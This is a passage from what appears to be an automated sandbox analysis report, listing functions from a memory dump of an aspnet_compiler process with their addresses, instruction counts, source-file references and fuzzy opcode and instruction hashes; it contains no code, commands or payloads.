                                                      • API String ID:
                                                      • Opcode ID: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
                                                      • Instruction ID: 5125f775416d10f29f0e17d88463181fe8893efe9bba6efbb8428e4fda8e33ae
                                                      • Opcode Fuzzy Hash: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
                                                      • Instruction Fuzzy Hash: A621D0729047469BD715EF69C984BABBBECEFD5640F08449ABD80C7251D730C918C7A2
                                                      Function 01AD2835 Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
                                                      • Instruction ID: 232174eb6566855f3aa08429be70bce02c5495b2751ae0298ad590256faf618b
                                                      • Opcode Fuzzy Hash: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
                                                      • Instruction Fuzzy Hash: 04212331606AC19BE727673C8D44B283B94EF41B70F6A03E5FA219B6E2DB68D801C210
                                                      Function 01AEA30B Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
                                                      • Instruction ID: 4c806f36d79557eb808d9f3e375df4ebc25c9fa39327b1b50270b99e36d5f769
                                                      • Opcode Fuzzy Hash: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
                                                      • Instruction Fuzzy Hash: D221AC792006119FCB29DF29C901B56B7F5FF08B04F1884ADE509CB761E371E846CB94
                                                      Function 01B6A49A Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
                                                      • Instruction ID: dd6cd53201ac8f3d9b343b4ef0077d4542f28e15762552c9581e1d8c0f9deb36
                                                      • Opcode Fuzzy Hash: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
                                                      • Instruction Fuzzy Hash: 3E113A72380A11BFDB26A5749C41F2B769DDBE4B60F1000A8B708EB190EF78DC0187D5
                                                      Function 01B30946 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
                                                      • Instruction ID: 96af5e3d1af4b668081bf206a02379b199c6a6fd212ce8ff2548edfda2fa9b54
                                                      • Opcode Fuzzy Hash: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
                                                      • Instruction Fuzzy Hash: B921C6B1E00249ABDB24DFAED9819AEFBF8FF98710F10016EE505A7250D7709945CB54
                                                      Function 01B480A8 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction ID: 81e39039b98199623e746b54212991d334971bfce6e568fcf45ed262a749dce3
                                                      • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction Fuzzy Hash: 0B218E72A00209EFDF129F99CC40BAEBBB9EF48710F20845AF905A7251D734D950EB50
                                                      Function 01AE0124 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction ID: e5a4c745ba1e1f696842ecce58c58220394e280672790d70ad3688f7fc7952f9
                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction Fuzzy Hash: 1411E272600705AFD7269B58CE88F9ABBB8EB80754F110029F6008F180D6B1ED44CB60
                                                      Function 01AB8770 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
                                                      • Instruction ID: 799bc36383aa4821989cb8e09adbdfd203112549baf5185e71f6797314a61dbf
                                                      • Opcode Fuzzy Hash: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
                                                      • Instruction Fuzzy Hash: C61104317016919BDB12CF4DC5C0A9ABBEDAF4A755B1840BDEE088F206D6B6D942C790
                                                      Function 01AEAAEE Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction ID: 640b6244a75b80d1da134ad345758b582ced7807ba0e1a2c98dbe5e5a41e8904
                                                      • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction Fuzzy Hash: 16218872600A41DFDB359F49C648A66FBF6EB94B50F14897DE94A9BA10C730EC01CB80
                                                      Function 01AB80E9 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
                                                      • Instruction ID: 78571980afb00c831b75ab50f616ca7930c717e3f7b0700b61456a61dce5c688
                                                      • Opcode Fuzzy Hash: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
                                                      • Instruction Fuzzy Hash: 2D219D71A01246DFCB14CF9CC581AAEBBB9FB88718F24416DD105AB311CB75AD06CBD0
                                                      Function 01AE674D Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
                                                      • Instruction ID: b76a03c1400c98271ec55ccf6a73fc16c76be5223dee0fe90c6808b55009f2b6
                                                      • Opcode Fuzzy Hash: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
                                                      • Instruction Fuzzy Hash: C2218C71600A01EFD7218F69C881B66B7F8FF54650F44882DE5AEC7250DB70A840CBA0
                                                      Function 01ADE8C0 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
                                                      • Instruction ID: 4c73fa7f6f698c05a6fc1a5de67d174eac53da777c68877bcbefb868b1559f29
                                                      • Opcode Fuzzy Hash: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
                                                      • Instruction Fuzzy Hash: 3A1125732051109BCB19CB28CD80A7BB766EBD5370B69456DD923CB280EA308C02C690
                                                      Function 01B46870 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
                                                      • Instruction ID: 85a2d8456ff188910c6602cf94dc2e771cac1a2e5bdc153ca9af01b76bd7b8c0
                                                      • Opcode Fuzzy Hash: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
                                                      • Instruction Fuzzy Hash: BA11E336640604FFD726DB5DCD40F9A77A8EF5AB50F018069F205DB251DBB0E901D7A0
                                                      Function 01AE66B0 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
                                                      • Instruction ID: a4fb0bea7c8b70488150f8a55688505224cea3168d86e7541129d7bd7c0940e8
                                                      • Opcode Fuzzy Hash: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
                                                      • Instruction Fuzzy Hash: E2119EB6A51205DFCB25CF59C584A5ABBF8AFA4750F09847ED909AB311FB34DD00CB90
                                                      Function 01B7A8E4 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                      • Instruction ID: ad6e2d6ef71e3c9e6013b6521538912f1a0a3a5d33611536127f60b91405f3b7
                                                      • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                      • Instruction Fuzzy Hash: 6D11C436A00915AFDF1DCB68CC05B9DBBB5EF84210F0982A9E85697380E775BD51CB80
                                                      Function 01AB0AD0 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                      • Instruction ID: 249209a897d2b86c2b01551c281a43fb3c040da0edd3a407a7a7d650acd052cc
                                                      • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                      • Instruction Fuzzy Hash: FD21C3B5A40B459FD3A0CF29D581B56BBF4FB48B20F10492EE98AC7B50E371E854CB94
                                                      Function 01B3E7E1 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                      • Instruction ID: bb6901b86dffddf332513cfbebab675a0e96bb052e10d52def05e0d8210833af
                                                      • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                      • Instruction Fuzzy Hash: 2A11C631E00605EFEB299F48C940B567BE5EFC5754F0584AEFA099B190E731EC50DB90
                                                      Function 01AD27ED Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9772fbbcf61707b5a0244e1bcef3e4375694f35e168e2b2d5ef4dfe87a5f6943
                                                      • Instruction ID: 980dc1292c5cd5d2eedcfea26851494b6180b3a9215f78c7579da650ec07c4a0
                                                      • Opcode Fuzzy Hash: 9772fbbcf61707b5a0244e1bcef3e4375694f35e168e2b2d5ef4dfe87a5f6943
                                                      • Instruction Fuzzy Hash: 56012631206A85AFE31BA27DDC84F6B7B9CFF90750F4A40B6F9018B251DA14EC00C2A1
                                                      Function 01AB4690 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9679faa85ff975ea143c1e7aee4103d4f09f37e306dcbb5a4bffaec16e80096
                                                      • Instruction ID: 9a0e31ba0aae65b34c20d3115b012783181155bbd3087f4b5975e52dbc4840c7
                                                      • Opcode Fuzzy Hash: d9679faa85ff975ea143c1e7aee4103d4f09f37e306dcbb5a4bffaec16e80096
                                                      • Instruction Fuzzy Hash: 3C11CE76200685AFDB25CF59D984F967BACEB8AB64F04411AF9068B653C370E880DF60
                                                      Function 01B84B00 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02c4bfb6f9167725db88c9a0c48c27fe1307c993636ea6f704a959ee6adf0000
                                                      • Instruction ID: 79e030b552183b24d8a0852d5f568d981f49400aa1fad39fb4a1b05f8f54e6e5
                                                      • Opcode Fuzzy Hash: 02c4bfb6f9167725db88c9a0c48c27fe1307c993636ea6f704a959ee6adf0000
                                                      • Instruction Fuzzy Hash: CC11E9362006129FD726EA69D840F67B7A5FFC4B11F154569E646C7690DB30E802C790
                                                      Function 01AE6620 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9454cbddc00b3922ce11fc5357e4cc63a6e8546f02441d134b6c81e565c569d5
                                                      • Instruction ID: 40dbf89c4e7728cfae748aecddca45ee59082f91dc0e51ae7ff2dda14c5ff61b
                                                      • Opcode Fuzzy Hash: 9454cbddc00b3922ce11fc5357e4cc63a6e8546f02441d134b6c81e565c569d5
                                                      • Instruction Fuzzy Hash: 3611C272A10615ABDB26DF59C9C4B9EFBF8EF54740F500858DA08A7201D734AD018F50
                                                      Function 01ADEA2E Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6d05033af75dbbde00e4d0a0b71653144a3ee0dd62ac0c5ebb12f1d28465abb
                                                      • Instruction ID: e9b3a2411274a14527520fb13ec84f7852e3d2e7580cb23bfdb00f5e01b812b0
                                                      • Opcode Fuzzy Hash: d6d05033af75dbbde00e4d0a0b71653144a3ee0dd62ac0c5ebb12f1d28465abb
                                                      • Instruction Fuzzy Hash: 9E01F17160014AAFC325DF18D584F66BBFAFB81314F6081AAE1068B266D770ED42CBA0
                                                      Function 01ADE53E Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction ID: 0047c5097f4f8fc95c995b959f9f716154bbed355009a33d0cc29c39bb386b76
                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction Fuzzy Hash: 0E11E572201AC29BEB27976CC944B753BA4EF00BC4F5E04E8DE428B642F329C846C250
                                                      Function 01B3E75D Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                      • Instruction ID: 8eb3284dbb91a8c57c9a1188cb8c89f9e417826d6a34587ff5830e94dd8ead08
                                                      • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                      • Instruction Fuzzy Hash: 1B01F536600105EFEB2A9F58CD40F5B7BA9EFC1B50F0581A6FA059B260E771DD50CB90
                                                      Function 01AAA250 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                      • Instruction ID: cda93277b4f64e8c011a311fcb6f86cb684ebba839e02f1f086a3c7b8ff4cba0
                                                      • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                      • Instruction Fuzzy Hash: 85014572504B229BCB328F19D840A327BF4FF55B607408A2DFD958B2A1C331D828CBA0
                                                      Function 01B84940 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 720df5a2b3de4837979c03f04d7529e2d1a260d4608036d9ee577a3dbe99575a
                                                      • Instruction ID: 3db42f82d6718bea24764c98fb49730670d81518c693c1844629af8c4a2f2a68
                                                      • Opcode Fuzzy Hash: 720df5a2b3de4837979c03f04d7529e2d1a260d4608036d9ee577a3dbe99575a
                                                      • Instruction Fuzzy Hash: 470145724416029FC336EF1CC904F52F7A8EB91B70B2643A9E9A89B1A2D730DC01CBC0
                                                      Function 01B2E1D0 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 145b9a528fd2638dea792352c141f96957bc8d56bc3a839915e449c17b317ab3
                                                      • Instruction ID: 85f0b740ef3b101b93954d0f7adc273ededae3870b79b4dc54de1a0f943608ee
                                                      • Opcode Fuzzy Hash: 145b9a528fd2638dea792352c141f96957bc8d56bc3a839915e449c17b317ab3
                                                      • Instruction Fuzzy Hash: 8C11C431241641EFDB15EF59CD80F567BB8FF58B54F1400A9F9069B661C335ED01CAA0
                                                      Function 01AB6259 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cb1f6b75cb652b489920cee824f4e6615928c4953e5bac942f013a87d506f67
                                                      • Instruction ID: 02cf8abdf0e5db594246f75c736d5701028e5ec7b0abd7ce78d88b573e327428
                                                      • Opcode Fuzzy Hash: 4cb1f6b75cb652b489920cee824f4e6615928c4953e5bac942f013a87d506f67
                                                      • Instruction Fuzzy Hash: 04114870941229ABEB25AF64CE42FE9B2B8BF04710F5041D9B718A60E1DB709E81CF84
                                                      Function 01AB208A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction ID: 76e48faaadf0d9d51892daa5dbf58b1f1aa0f50046278d244bc904aa4605bb6f
                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction Fuzzy Hash: 9001F5322001418BDF269A2DD8C0BA27B6AFFC4610F1944ABED058F287DA71AC81C790
                                                      Function 01B36050 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b26d8e188c6ba7cd1e001f23348763c9d6057af971d3180ee0484a95b966890b
                                                      • Instruction ID: cbd68a3722267c083144b4c3054a623f3b18c10ff5f09f407c24a5da1b33c0ed
                                                      • Opcode Fuzzy Hash: b26d8e188c6ba7cd1e001f23348763c9d6057af971d3180ee0484a95b966890b
                                                      • Instruction Fuzzy Hash: A5111772900019BBCB15DB94CD85DEFBBBCEF58354F044166E916E7211EA34EA15CBE0
                                                      Function 01B46500 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e712c8360d745233cc0805a80c999413d84b1287192fb48854b4fe3ccaea9988
                                                      • Instruction ID: dd5d5c6f2c9a5d320d20d89f44daacdbf39f9f0b952babbe5338692e65793444
                                                      • Opcode Fuzzy Hash: e712c8360d745233cc0805a80c999413d84b1287192fb48854b4fe3ccaea9988
                                                      • Instruction Fuzzy Hash: E111C47264414A9FD715CF58D810BA6BBB9FB5A314F08C199E888CB315D732EC81DBE0
                                                      Function 01B3C810 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01cf5f2fedac5d111ac2d059d12b513f56215bc1fce994f8091988c3fd9e3f8c
                                                      • Instruction ID: 33bba78c4e71d64bd11c354df9616af82828ec90f7f456ae4ee3ccdf0dcf1bf6
                                                      • Opcode Fuzzy Hash: 01cf5f2fedac5d111ac2d059d12b513f56215bc1fce994f8091988c3fd9e3f8c
                                                      • Instruction Fuzzy Hash: 3111E8B5A002099BCB04DFA9D581AAEBBF8FF58250F10806AF905E7351D674EE01CBA4
                                                      Function 01AF20F0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
